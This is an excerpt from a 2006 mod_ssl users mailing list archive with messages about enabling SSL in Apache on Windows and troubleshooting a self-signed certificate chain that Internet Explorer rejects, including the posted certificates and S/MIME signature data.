Received: by master.modssl.org (Postfix, from userid 30101)
	id BFFE514D89B; Fri, 13 Oct 2006 14:12:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hqusareur.army.mil (mail1.hqusareur.army.mil [144.170.66.103])
	by master.modssl.org (Postfix) with ESMTP id 8383614D82C
	for ; Fri, 13 Oct 2006 14:12:04 +0200 (CEST)
Message-ID: <673CAD77D9D4C14DB8B949B4A30F39C905641372@CMBL0019HQUS412.EUR.DS.ARMY.MIL>
From: "Rhoden, Barret J. Mr. CN (NGIT) HQ USAREUR/7A CIO G6"
	 
To: "'modssl-users@modssl.org'" 
Subject: RE: Newbie Question regarding mod_ssl
Date: Fri, 13 Oct 2006 14:11:27 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2658.27)
MIME-Version: 1.0
Content-Type: multipart/signed;
	micalg=SHA1;
	protocol="application/x-pkcs7-signature";
	boundary="----=_NextPart_000_0026_01C6EED1.7846A8B0"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rhoden, Barret J. Mr. CN (NGIT) HQ USAREUR/7A CIO G6" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0026_01C6EED1.7846A8B0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

> > Erol Yalaz schrieb:
> >> I have a WIN2003 box with the latest Apache on it (2.2.3) and it is
> >> working great.  I need to get mod_ssl working.  
> Unfortunately, I can't
> >>
> >> Any suggestions?  Shouldn't there be some pre-compiled 
> binaries out there?

i haven't used apache on windows, but the *nix versions can have ssl
compiled directly into apache.  if you're compiling your own apache, then
you should be able to --enable-ssl when you ./configure, or however you'll
do it.

------=_NextPart_000_0026_01C6EED1.7846A8B0
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIQhzCCA3Aw
ggJYoAMCAQICAQUwDQYJKoZIhvcNAQEFBQAwWzELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4g
R292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxFjAUBgNVBAMTDURvRCBSb290
IENBIDIwHhcNMDQxMjEzMTUwMDEwWhcNMjkxMjA1MTUwMDEwWjBbMQswCQYDVQQGEwJVUzEYMBYG
A1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEWMBQGA1UE
AxMNRG9EIFJvb3QgQ0EgMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMAswfaNO6z/
PzzWcb64dCIH7HBBFfyrQOMHqsHD2J/+2kw6vz/I2Ch7SzYBwKxFJcPSDgqPhRhkED0aE3Aqb47X
3I2Ts0EPOCHNravCPSoF01cRNw3NjFH5k+PMRkkhjhS0zcsUPjjNcjHuqxLyZeo0LlZd/+5jdctt
upE0/J7z9C0cvlDEQt9ZiP9qs/qobD3LVnFxBZa7n4DlgEVZZ0Gw68OtYKSAdQYXnA70Q+CZDhv7
f/WzzLKBgrH9MsG4vkGkZLVgOlpRMIzO3kEsGUdcSRBkuXSph0GvfW66wbihv2UxOgRn+bW7jpKK
AGO4seaMOF+D/1DVO6Jda7IQzGMCAwEAAaM/MD0wHQYDVR0OBBYEFEl0uwxeunr+AlTve6DGlcYJ
gHCWMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQCYkY0/
ici79cBpcyk7Nay6swh2PXAJkumERCEBfRR2G+5RbB2NFTctezFp9JpEuK9GzDT6I8sDJxnSgyF1
K+fgG5km3IRAleio0sz2WFxm7z9KlxCCHboKot1bBiudp2RO6y4BNaS0PxOtVeTVc6hpmxHxmPIx
Hm9A1Ph4n46RoG9wBJBmqgYrzuF6krV94eDRluehOi3MsZ0fBUTth5nTTRpwOcEEDOV+2fGv1yAO
8SJ6JaRzmcw/pAcnlqiile2CuRbTnguHwsHyiPVi32jfx7xpUe2xXNxUVCkPCTmarAPB2wxNrm8K
ehZJ8b+R0jiU0/aVLLdsyUK2jcqQjYXZMIIEOjCCAyKgAwIBAgIBCjANBgkqhkiG9w0BAQUFADBb
MQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAK
BgNVBAsTA1BLSTEWMBQGA1UEAxMNRG9EIFJvb3QgQ0EgMjAeFw0wNjAxMDIxNjQ1NTVaFw0xMjAx
MDExNjQ1NTVaMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNV
BAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTEwgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAJt/S53u+fQFTZVCVscNoG3PEvOPdQ9esPH/+QYHoT2D6eyl8h/P
/XDcn1Ol44MuGiOyJSqQu4+z1JTUlr4fIqFIqb2ZPH7TvLhTVBVBm+72CEP+GQ0PdPVPimEhCkbe
mKEOll0EDrAglPgr2v/2UqpWGraX3F9emrd2goG5uLbzAgMBAAGjggGJMIIBhTAOBgNVHQ8BAf8E
BAMCAYYwHwYDVR0jBBgwFoAUSXS7DF66ev4CVO97oMaVxgmAcJYwHQYDVR0OBBYEFFMVA0XudKE0
XWyGr3JmgW/prX8SMAwGA1UdJAQFMAOAAQAwDwYDVR0TAQH/BAUwAwEB/zAwBgNVHSAEKTAnMAsG
CWCGSAFlAgELBTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIHhBgNVHR8EgdkwgdYwOqA4oDaG
NGh0dHA6Ly9jcmwuY2hhbWIuZGlzYS5taWwvZ2V0Y3JsP0RvRCUyMFJvb3QlMjBDQSUyMDIwgZeg
gZSggZGGgY5sZGFwOi8vY3JsLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9EJTIwUm9vdCUyMENBJTIw
MiUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMl
M2ZjZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0JTNiYmluYXJ5MA0GCSqGSIb3DQEBBQUAA4IBAQAV
W1W5SW90jXnRBVlZW4It5eYWRoVLNs8eEDMDEi8Yju5mTBYXms45LYHqFOQgMIOivDQ6LJucW+ci
T79LiQqkSng8FFgWCMAWUT9k5HZSvGfv4vBxW7IZjr2Cvo4yEUCK97hh24oRNl+8J10ASIMgOjRK
kdVukh/KmTbiIdSwmBg/WQRcj1A9C59j2ITb8N8/UUPGppaMrMV1TWX1TzAkGcng6/dWUYODfe8v
Cm42sskZKew/ndIQg97x6F7o5PvtwrSQsJ/DxXJdTuZx9SxGTCYqLgkyyaGd5wLB3PN9VqvRcab2
h9L+ZN2juAkPxqJv88cZ2pKZhTYjlcpunIHSMIIEQTCCA6qgAwIBAgIDD4U3MA0GCSqGSIb3DQEB
BQUAMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0Rv
RDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTEwHhcNMDYwODE1MDAwMDAw
WhcNMDgwOTI4MjM1OTU5WjCBgjELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVu
dDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxEzARBgNVBAsTCkNPTlRSQUNUT1IxKDAmBgNV
BAMTH1JIT0RFTi5CQVJSRVQuSk9TRVBILjEwMzMzMTgzNjMwgZ8wDQYJKoZIhvcNAQEBBQADgY0A
MIGJAoGBAOaMCg59ekyDIEyKqDtVZRYBzDtLdoB8LUzbdpwS8QIPR5WF4V/n3bXkKQ/ovUiHRTVp
Bs0clDdOuJkeOWlUvB0krsP0wpt/cTjqwqAHNfvEFfSWWJDh5iNi3oyDuLJ9MgTvCJqwLlxCQZ1K
IsHN0IQegxEf1e9Pb9Z2g2jvU2CnAgMBAAGjggHnMIIB4zAOBgNVHQ8BAf8EBAMCBSAwJAYDVR0R
BB0wG4EZYmFycmV0LnJob2RlbkB1cy5hcm15Lm1pbDAfBgNVHSMEGDAWgBRTFQNF7nShNF1shq9y
ZoFv6a1/EjAdBgNVHQ4EFgQUa/L1eKk7KVnsAUSfvFp8phl9bYkwFgYDVR0gBA8wDTALBglghkgB
ZQIBCwkwcwYIKwYBBQUHAQEEZzBlMEEGCCsGAQUFBzAChjVodHRwOi8vY3JsLmNoYW1iLmRpc2Eu
bWlsL2dldHNpZ24/RE9EJTIwRU1BSUwlMjBDQS0xMTAgBggrBgEFBQcwAYYUaHR0cDovL29jc3Au
ZGlzYS5taWwwgd0GA1UdHwSB1TCB0jA6oDigNoY0aHR0cDovL2NybC5jaGFtYi5kaXNhLm1pbC9n
ZXRjcmw/RE9EJTIwRU1BSUwlMjBDQS0xMTCBk6CBkKCBjYaBimxkYXA6Ly9jcmwuY2hhbWIuZGlz
YS5taWwvY24lM2REb0QlMjBFTUFJTCUyMENBLTExJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28l
M2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2Jp
bmFyeTANBgkqhkiG9w0BAQUFAAOBgQCaNMz38W9/gOXTX6rP6sdAPJSh2X6y1V6Kd/nL5Q+DJp5T
VwA0Z/iBZhNnahA1QqJ29qMnTR2Z2RdzplobDAlL1xaNH0dnYc9RtkREh/iZgZC35de2+O/oXgVn
F6KtpQzNzmy5F4KnP79pmE6eaWQ8ZVfTelXcrNM+XySD0Kh2VTCCBIwwggP1oAMCAQICAw+FOzAN
BgkqhkiG9w0BAQUFADBdMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQww
CgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEYMBYGA1UEAxMPRE9EIEVNQUlMIENBLTExMB4XDTA2
MDgxNTAwMDAwMFoXDTA4MDkyODIzNTk1OVowgYIxCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMu
IEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRMwEQYDVQQLEwpDT05UUkFD
VE9SMSgwJgYDVQQDEx9SSE9ERU4uQkFSUkVULkpPU0VQSC4xMDMzMzE4MzYzMIGfMA0GCSqGSIb3
DQEBAQUAA4GNADCBiQKBgQDbPGi6UXFj308mjrYM+GBzh+Zb5eAEFsiIuBZLm3OXW9JgRfcmpC+9
zbk23ShtHunsC4kSsQxu6a8zeQvTdH/xeECvMjHUHGmdevFAYm7m0eUJ7cjCx9oG0PJDCkSIVn4Z
Q1brSXDt5FGHcW8TVKlJS6ZzcanQdj1uPl3DXBOeLwIDAQABo4ICMjCCAi4wDgYDVR0PAQH/BAQD
AgbAMB8GA1UdIwQYMBaAFFMVA0XudKE0XWyGr3JmgW/prX8SMB0GA1UdDgQWBBTNpXd3ebuYfdZi
7MqjrqqRAsqJJzAWBgNVHSAEDzANMAsGCWCGSAFlAgELCTBzBggrBgEFBQcBAQRnMGUwQQYIKwYB
BQUHMAKGNWh0dHA6Ly9jcmwuY2hhbWIuZGlzYS5taWwvZ2V0c2lnbj9ET0QlMjBFTUFJTCUyMENB
LTExMCAGCCsGAQUFBzABhhRodHRwOi8vb2NzcC5kaXNhLm1pbDCB3QYDVR0fBIHVMIHSMDqgOKA2
hjRodHRwOi8vY3JsLmNoYW1iLmRpc2EubWlsL2dldGNybD9ET0QlMjBFTUFJTCUyMENBLTExMIGT
oIGQoIGNhoGKbGRhcDovL2NybC5jaGFtYi5kaXNhLm1pbC9jbiUzZERvRCUyMEVNQUlMJTIwQ0Et
MTElMmNvdSUzZFBLSSUyY291JTNkRG9EJTJjbyUzZFUuUy4lMjBHb3Zlcm5tZW50JTJjYyUzZFVT
P2NlcnRpZmljYXRlcmV2b2NhdGlvbmxpc3Q7YmluYXJ5MCkGA1UdJQQiMCAGCisGAQQBgjcUAgIG
CCsGAQUFBwMEBggrBgEFBQcDAjBEBgNVHREEPTA7gRliYXJyZXQucmhvZGVuQHVzLmFybXkubWls
oB4GCisGAQQBgjcUAgOgEAwOMTAzMzMxODM2M0BtaWwwDQYJKoZIhvcNAQEFBQADgYEARUnjK8Nl
dkULmiNcGSV96GYS8TLncTe/fLKDxTCrvOCRdIMdJe82YoBRlAPcrYMLgrHgJkGSrhPCxXRKfhVy
vReYrCwYELib7o1RqA5ayMp4YNSogxrRXQ1xh6zjBTXdICMtkATndnc9d3MXSyN9U1tRAUV2TE+d
Thj7nX0R+hUxggLAMIICvAIBATBkMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVy
bm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0Et
MTECAw+FOzAJBgUrDgMCGgUAoIIBsjAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw0wNjEwMTMxMjExMjZaMCMGCSqGSIb3DQEJBDEWBBTa6GCV37XG84pq6kMI8oMa+Ezj
ITBnBgkqhkiG9w0BCQ8xWjBYMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0D
AgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDAHBgUrDgMCGjAKBggqhkiG9w0CBTBzBgkrBgEE
AYI3EAQxZjBkMF0xCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNV
BAsTA0RvRDEMMAoGA1UECxMDUEtJMRgwFgYDVQQDEw9ET0QgRU1BSUwgQ0EtMTECAw+FNzB1Bgsq
hkiG9w0BCRACCzFmoGQwXTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEM
MAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxGDAWBgNVBAMTD0RPRCBFTUFJTCBDQS0xMQIDD4U3
MA0GCSqGSIb3DQEBAQUABIGAVC/3hZyLPjJ87CKS0hZe+BvpEtxwpTzIjf0RO4nl7ZWwGq7NvTQk
PA1VYxKVCSIbgfaq+/cJ5zIdphAh8jxtNbo1rI137KtwX7H6ZSJlkGoS6053+hL/RjgrRC26fb2L
I8gJcevgzV0vKkM9WCGEDRYCKRgeKLIn1kQ8IW8wpRUAAAAAAAA=

------=_NextPart_000_0026_01C6EED1.7846A8B0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 13 14:24:43 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7BCEF14D84A; Fri, 13 Oct 2006 14:24:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id A73B214D884
	for ; Fri, 13 Oct 2006 14:24:38 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id CB80C6416D
	for ; Fri, 13 Oct 2006 15:21:40 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id fGnCyfz-Mda5 for ;
	Fri, 13 Oct 2006 15:21:38 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id BDBBB64053
	for ; Fri, 13 Oct 2006 15:21:38 +0300 (EEST)
Received: from 84.243.98.130
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Fri, 13 Oct 2006 15:21:38 +0300 (EEST)
Message-ID: <2040.84.243.98.130.1160742098.squirrel@193.226.82.7>
In-Reply-To: <200610111825.54190.ppatterson@carillonis.com>
References: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com>
    <200610111825.54190.ppatterson@carillonis.com>
Date: Fri, 13 Oct 2006 15:21:38 +0300 (EEST)
Subject: Re: Encrypted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="----=_20061013152138_77835"
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_20061013152138_77835
Content-Type: text/plain; charset="iso-8859-2"
Content-Transfer-Encoding: 8bit

> Are you able to post the certificate here? It sounds like the issue may be
> the
> key usage, or an entry in some other field - I've seen results like this
> if
> you don't have key agreement set, or some of the other fields mangled, or
> particular security settings enabled in your certificate.

Hi,

Please find attached the CA cert and the server cert.

I can successfully import the CA cert into IE, under Trusted Root
Certification Authorities.

If I download the server cert and open it from Windows (XP), it's
description says:

"This certification authority does not appear to be allowed to issue
certificates or cannot be used as an end-entity certificate."

Thank you,
BBR



------=_20061013152138_77835
Content-Type: text/plain; name="servercert.pem.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="servercert.pem.txt"

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=RO, ST=Romania, O=ViitorPlus - Asociatia pentru Dezvoltare Durabila, OU=Mailserver, CN=mail.viitorplus.ro/emailAddress=postmaster@viitorplus.ro
        Validity
            Not Before: Oct 13 11:05:36 2006 GMT
            Not After : Oct 13 11:05:36 2007 GMT
        Subject: C=RO, ST=Romania, L=Bucuresti, O=ViitorPlus - Asociatia pentru Dezvoltare Durabila, OU=Mailserver, CN=mail.viitorplus.ro/emailAddress=postmaster@viitorplus.ro
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:9d:fc:97:66:39:ea:e9:71:8f:ac:bc:61:6c:3c:
                    ea:22:c4:63:7b:5d:e0:30:90:36:0d:cb:e8:1a:fc:
                    94:c3:16:d2:3e:68:0a:28:7e:5b:f2:df:c1:26:db:
                    f9:7b:e7:ba:0c:db:ce:14:e1:7b:06:fc:de:84:f4:
                    c9:75:2e:2b:3c:59:35:77:2e:6f:69:86:f4:06:45:
                    b0:d0:d6:63:3c:f0:5a:e6:93:85:63:76:48:05:bc:
                    a4:f9:6c:c4:f2:46:52:b4:24:33:86:be:f7:8f:e3:
                    26:ac:c6:54:91:d0:22:90:ed:65:43:0f:ce:fd:3c:
                    0e:22:e2:a6:c6:3a:58:c9:f9
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                82:F6:EB:37:29:D0:01:77:69:9A:A6:D0:5B:96:1C:2B:11:56:BA:9B
            X509v3 Authority Key Identifier: 
                keyid:B8:08:C2:8D:00:43:01:FD:1E:58:8C:6B:E2:4A:A2:93:EB:FC:50:0F

    Signature Algorithm: sha1WithRSAEncryption
        a4:ba:b4:28:8b:92:06:9d:a6:dc:e9:17:71:03:f8:51:52:a4:
        da:62:86:ee:68:77:8f:e2:a7:cc:13:5e:91:a7:13:45:25:68:
        37:4f:0b:01:5e:1c:5d:10:2b:6c:4b:7c:f7:0b:77:7a:f9:ea:
        f7:8b:14:20:42:32:10:e5:12:9a:0a:f0:b9:fd:e1:bb:93:8d:
        33:78:94:8a:d1:57:e7:25:d7:2b:d3:87:55:b2:95:48:5e:83:
        f5:f9:fb:e4:1b:71:93:c4:0c:e4:e6:02:8a:c0:6f:44:bd:ed:
        21:db:92:f0:ca:a3:c1:7e:d2:1f:6d:bd:92:09:7d:72:4b:a0:
        f5:b0
-----BEGIN CERTIFICATE-----
MIIDczCCAtygAwIBAgIBATANBgkqhkiG9w0BAQUFADCBtjELMAkGA1UEBhMCUk8x
EDAOBgNVBAgTB1JvbWFuaWExOjA4BgNVBAoTMVZpaXRvclBsdXMgLSBBc29jaWF0
aWEgcGVudHJ1IERlenZvbHRhcmUgRHVyYWJpbGExEzARBgNVBAsTCk1haWxzZXJ2
ZXIxGzAZBgNVBAMTEm1haWwudmlpdG9ycGx1cy5ybzEnMCUGCSqGSIb3DQEJARYY
cG9zdG1hc3RlckB2aWl0b3JwbHVzLnJvMB4XDTA2MTAxMzExMDUzNloXDTA3MTAx
MzExMDUzNlowgcoxCzAJBgNVBAYTAlJPMRAwDgYDVQQIEwdSb21hbmlhMRIwEAYD
VQQHEwlCdWN1cmVzdGkxOjA4BgNVBAoTMVZpaXRvclBsdXMgLSBBc29jaWF0aWEg
cGVudHJ1IERlenZvbHRhcmUgRHVyYWJpbGExEzARBgNVBAsTCk1haWxzZXJ2ZXIx
GzAZBgNVBAMTEm1haWwudmlpdG9ycGx1cy5ybzEnMCUGCSqGSIb3DQEJARYYcG9z
dG1hc3RlckB2aWl0b3JwbHVzLnJvMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQCd/JdmOerpcY+svGFsPOoixGN7XeAwkDYNy+ga/JTDFtI+aAooflvy38Em2/l7
57oM284U4XsG/N6E9Ml1Lis8WTV3Lm9phvQGRbDQ1mM88Frmk4VjdkgFvKT5bMTy
RlK0JDOGvveP4yasxlSR0CKQ7WVDD879PA4i4qbGOljJ+QIDAQABo3sweTAJBgNV
HRMEAjAAMCwGCWCGSAGG+EIBDQQfFh1PcGVuU1NMIEdlbmVyYXRlZCBDZXJ0aWZp
Y2F0ZTAdBgNVHQ4EFgQUgvbrNynQAXdpmqbQW5YcKxFWupswHwYDVR0jBBgwFoAU
uAjCjQBDAf0eWIxr4kqik+v8UA8wDQYJKoZIhvcNAQEFBQADgYEApLq0KIuSBp2m
3OkXcQP4UVKk2mKG7mh3j+KnzBNekacTRSVoN08LAV4cXRArbEt89wt3evnq94sU
IEIyEOUSmgrwuf3hu5ONM3iUitFX5yXXK9OHVbKVSF6D9fn75Btxk8QM5OYCisBv
RL3tIduS8MqjwX7SH229kgl9ckug9bA=
-----END CERTIFICATE-----
------=_20061013152138_77835
Content-Type: text/plain; name="cacert.pem.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="cacert.pem.txt"

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 0 (0x0)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=RO, ST=Romania, O=ViitorPlus - Asociatia pentru Dezvoltare Durabila, OU=Mailserver, CN=mail.viitorplus.ro/emailAddress=postmaster@viitorplus.ro
        Validity
            Not Before: Oct 13 11:04:32 2006 GMT
            Not After : Oct 10 11:04:32 2016 GMT
        Subject: C=RO, ST=Romania, O=ViitorPlus - Asociatia pentru Dezvoltare Durabila, OU=Mailserver, CN=mail.viitorplus.ro/emailAddress=postmaster@viitorplus.ro
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:e6:0e:73:93:1a:09:f0:ff:28:21:a4:81:47:25:
                    51:37:7d:92:d6:13:49:6d:e5:40:c3:9a:45:51:5c:
                    92:92:7c:cf:8c:77:28:36:91:d9:f5:07:8e:b1:a6:
                    2e:19:2b:a9:ae:19:df:37:8d:a1:7d:90:ce:0b:a0:
                    2c:75:66:10:50:eb:63:7a:96:5e:20:c4:05:e7:b3:
                    cb:3c:f0:cd:32:2a:54:fc:52:c0:7e:0d:7c:e8:ea:
                    14:1c:5d:5f:85:7a:b3:26:06:16:ca:64:c3:79:55:
                    6f:5d:69:a7:7d:e9:24:e4:e9:29:d0:ce:9e:ee:73:
                    06:d2:f6:c7:e2:52:d0:0a:3f
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                B8:08:C2:8D:00:43:01:FD:1E:58:8C:6B:E2:4A:A2:93:EB:FC:50:0F
            X509v3 Authority Key Identifier: 
                keyid:B8:08:C2:8D:00:43:01:FD:1E:58:8C:6B:E2:4A:A2:93:EB:FC:50:0F

    Signature Algorithm: sha1WithRSAEncryption
        a7:5b:9e:c0:ab:ae:95:a9:93:1e:c8:10:41:9e:a9:f4:52:6c:
        c6:b8:a1:71:ec:62:e7:71:2f:53:c8:e0:34:52:6e:ed:6f:a4:
        50:86:78:ed:79:4c:41:bb:79:2a:b8:22:45:55:73:a6:63:66:
        ca:2c:86:d1:80:eb:a8:5a:21:20:26:3b:05:e3:f3:07:01:6b:
        e0:d7:16:ee:92:7a:1d:b6:ac:9d:de:78:3e:46:56:ae:9d:a5:
        ac:ea:bb:5b:47:f0:8e:b4:62:7f:e8:7e:5a:aa:7f:49:8b:ba:
        f2:77:bd:65:22:a6:1d:bf:3b:e1:4d:aa:dc:29:2a:5f:54:0d:
        22:af
-----BEGIN CERTIFICATE-----
MIIDXzCCAsigAwIBAgIBADANBgkqhkiG9w0BAQUFADCBtjELMAkGA1UEBhMCUk8x
EDAOBgNVBAgTB1JvbWFuaWExOjA4BgNVBAoTMVZpaXRvclBsdXMgLSBBc29jaWF0
aWEgcGVudHJ1IERlenZvbHRhcmUgRHVyYWJpbGExEzARBgNVBAsTCk1haWxzZXJ2
ZXIxGzAZBgNVBAMTEm1haWwudmlpdG9ycGx1cy5ybzEnMCUGCSqGSIb3DQEJARYY
cG9zdG1hc3RlckB2aWl0b3JwbHVzLnJvMB4XDTA2MTAxMzExMDQzMloXDTE2MTAx
MDExMDQzMlowgbYxCzAJBgNVBAYTAlJPMRAwDgYDVQQIEwdSb21hbmlhMTowOAYD
VQQKEzFWaWl0b3JQbHVzIC0gQXNvY2lhdGlhIHBlbnRydSBEZXp2b2x0YXJlIER1
cmFiaWxhMRMwEQYDVQQLEwpNYWlsc2VydmVyMRswGQYDVQQDExJtYWlsLnZpaXRv
cnBsdXMucm8xJzAlBgkqhkiG9w0BCQEWGHBvc3RtYXN0ZXJAdmlpdG9ycGx1cy5y
bzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5g5zkxoJ8P8oIaSBRyVRN32S
1hNJbeVAw5pFUVySknzPjHcoNpHZ9QeOsaYuGSuprhnfN42hfZDOC6AsdWYQUOtj
epZeIMQF57PLPPDNMipU/FLAfg186OoUHF1fhXqzJgYWymTDeVVvXWmnfekk5Okp
0M6e7nMG0vbH4lLQCj8CAwEAAaN7MHkwCQYDVR0TBAIwADAsBglghkgBhvhCAQ0E
HxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFLgIwo0A
QwH9HliMa+JKopPr/FAPMB8GA1UdIwQYMBaAFLgIwo0AQwH9HliMa+JKopPr/FAP
MA0GCSqGSIb3DQEBBQUAA4GBAKdbnsCrrpWpkx7IEEGeqfRSbMa4oXHsYudxL1PI
4DRSbu1vpFCGeO15TEG7eSq4IkVVc6ZjZsoshtGA66haISAmOwXj8wcBa+DXFu6S
eh22rJ3eeD5GVq6dpazqu1tH8I60Yn/oflqqf0mLuvJ3vWUiph2/O+FNqtwpKl9U
DSKv
-----END CERTIFICATE-----
------=_20061013152138_77835--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 13 14:49:59 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A8AB114D867; Fri, 13 Oct 2006 14:49:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relais.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 687B614D82B
	for ; Fri, 13 Oct 2006 14:49:58 +0200 (CEST)
Received: from avril.internal.test ([66.131.181.208])
 by VL-MO-MR001.ip.videotron.ca
 (Sun Java System Messaging Server 6.2-2.05 (built Apr 28 2005))
 with SMTP id <0J7200EORRMXNDE0@VL-MO-MR001.ip.videotron.ca> for
 modssl-users@modssl.org; Fri, 13 Oct 2006 08:49:45 -0400 (EDT)
Received: (qmail 29511 invoked from network); Fri, 13 Oct 2006 12:49:45 +0000
Received: from unknown (HELO ?192.168.42.128?) (192.168.42.128)
 by avril.internal.test with SMTP; Fri, 13 Oct 2006 12:49:45 +0000
Date: Fri, 13 Oct 2006 08:46:57 -0400
From: Patrick Patterson 
Subject: Re: Encrypted page would not load into IE
In-reply-to: <2040.84.243.98.130.1160742098.squirrel@193.226.82.7>
To: modssl-users@modssl.org
Message-id: <200610130846.59178.ppatterson@carillonis.com>
